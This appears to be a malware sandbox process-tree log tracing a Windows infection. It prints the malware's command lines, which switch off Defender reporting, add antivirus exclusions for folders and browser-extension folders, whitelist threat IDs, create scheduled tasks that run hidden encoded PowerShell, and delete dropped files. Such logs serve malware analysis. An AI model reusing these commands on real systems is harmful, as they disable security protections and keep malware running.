C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202401122309221\assistant\assistant_installer.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202401122309221\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=106.0.4998.16 --initial-client-data=0x274,0x278,0x27c,0x250,0x280,0x312614,0x312620,0x31262c5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2296
-
-
-
-
C:\Users\Admin\Pictures\XuWl4dYFqa7cvhkX4rvdFKNi.exe"C:\Users\Admin\Pictures\XuWl4dYFqa7cvhkX4rvdFKNi.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2672 -
C:\Users\Admin\AppData\Local\Temp\BroomSetup.exeC:\Users\Admin\AppData\Local\Temp\BroomSetup.exe4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4172 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Temp\Task.bat" "5⤵
- Suspicious use of WriteProcessMemory
PID:180 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\Admin\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F6⤵
- Creates scheduled task(s)
PID:2884
-
-
C:\Windows\SysWOW64\chcp.comchcp 12516⤵PID:4776
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\nsr981B.tmpC:\Users\Admin\AppData\Local\Temp\nsr981B.tmp4⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:2972 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\AppData\Local\Temp\nsr981B.tmp" & del "C:\ProgramData\*.dll"" & exit5⤵PID:4768
-
C:\Windows\SysWOW64\timeout.exetimeout /t 56⤵
- Delays execution with timeout.exe
PID:4480
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2972 -s 34205⤵
- Program crash
PID:4560
-
-
-
-
C:\Users\Admin\Pictures\XmUoKB0z5EXP4yDeUpNpxAYi.exe"C:\Users\Admin\Pictures\XmUoKB0z5EXP4yDeUpNpxAYi.exe"3⤵
- Executes dropped EXE
PID:5200 -
C:\Users\Admin\AppData\Local\Temp\7zS7B46.tmp\Install.exe.\Install.exe4⤵
- Executes dropped EXE
PID:1052 -
C:\Users\Admin\AppData\Local\Temp\7zS7FF9.tmp\Install.exe.\Install.exe /tSUWodidgk "385118" /S5⤵
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Drops file in System32 directory
- Enumerates system info in registry
PID:3852 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1348 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&7⤵PID:1144
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"6⤵PID:4940
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gOipRYOJp" /SC once /ST 20:59:05 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="6⤵
- Creates scheduled task(s)
PID:5864
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gOipRYOJp"6⤵PID:4952
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gOipRYOJp"6⤵PID:4060
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bLyGxHYCYhmZEhkSec" /SC once /ST 23:11:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\ogUloyuXvrpBpKVaB\dRWIRjKfRjRPExc\yDcfZLb.exe\" A6 /GHsite_idoKq 385118 /S" /V1 /F6⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:5972
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&1⤵PID:1520
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:642⤵PID:3124
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:322⤵PID:2936
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:641⤵PID:5440
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:321⤵PID:744
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5720 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4328
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵PID:5788
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:5184
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:5860
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 2972 -ip 29721⤵PID:428
-
C:\Users\Admin\AppData\Local\Temp\ogUloyuXvrpBpKVaB\dRWIRjKfRjRPExc\yDcfZLb.exeC:\Users\Admin\AppData\Local\Temp\ogUloyuXvrpBpKVaB\dRWIRjKfRjRPExc\yDcfZLb.exe A6 /GHsite_idoKq 385118 /S1⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:5928 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"2⤵PID:2720
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵PID:3480
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵PID:3988
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵PID:3816
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵
- Adds Run key to start application
- Checks for VirtualBox DLLs, possible anti-VM trick
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:5412
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵PID:1408
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵PID:5932
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵PID:5948
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵PID:6104
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵PID:2080
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵PID:2084
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵PID:5140
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵PID:2988
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵PID:3460
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵PID:4112
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵PID:1248
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵PID:5688
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵PID:5988
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵PID:1584
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵PID:3448
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵PID:2408
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵PID:4560
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵PID:5664
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵PID:5436
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵PID:5900
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵PID:4352
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:323⤵PID:2672
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:643⤵PID:5432
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:323⤵PID:3576
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:643⤵PID:1284
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\AsRtOTETCNfDC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\AsRtOTETCNfDC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\BCDBNUauOckU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\BCDBNUauOckU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\VjBUDnCPU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\VjBUDnCPU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qFmzepOeHSjDLjQlSgR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qFmzepOeHSjDLjQlSgR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qdWBYcETnEUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qdWBYcETnEUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\WhKQivtBOjWPJtVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\WhKQivtBOjWPJtVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\ogUloyuXvrpBpKVaB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\ogUloyuXvrpBpKVaB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\osszcinDeFgrFwAQ\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\osszcinDeFgrFwAQ\" /t REG_DWORD /d 0 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5864 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AsRtOTETCNfDC" /t REG_DWORD /d 0 /reg:323⤵PID:6084
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AsRtOTETCNfDC" /t REG_DWORD /d 0 /reg:324⤵PID:3568
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AsRtOTETCNfDC" /t REG_DWORD /d 0 /reg:643⤵PID:2300
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BCDBNUauOckU2" /t REG_DWORD /d 0 /reg:323⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3768
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BCDBNUauOckU2" /t REG_DWORD /d 0 /reg:643⤵PID:4768
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VjBUDnCPU" /t REG_DWORD /d 0 /reg:323⤵PID:4208
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VjBUDnCPU" /t REG_DWORD /d 0 /reg:643⤵PID:5600
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qFmzepOeHSjDLjQlSgR" /t REG_DWORD /d 0 /reg:323⤵PID:424
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qFmzepOeHSjDLjQlSgR" /t REG_DWORD /d 0 /reg:643⤵PID:5148
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qdWBYcETnEUn" /t REG_DWORD /d 0 /reg:323⤵PID:3616
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qdWBYcETnEUn" /t REG_DWORD /d 0 /reg:643⤵PID:3440
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\WhKQivtBOjWPJtVB /t REG_DWORD /d 0 /reg:323⤵PID:2892
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\WhKQivtBOjWPJtVB /t REG_DWORD /d 0 /reg:643⤵PID:1152
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵PID:2684
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵PID:2508
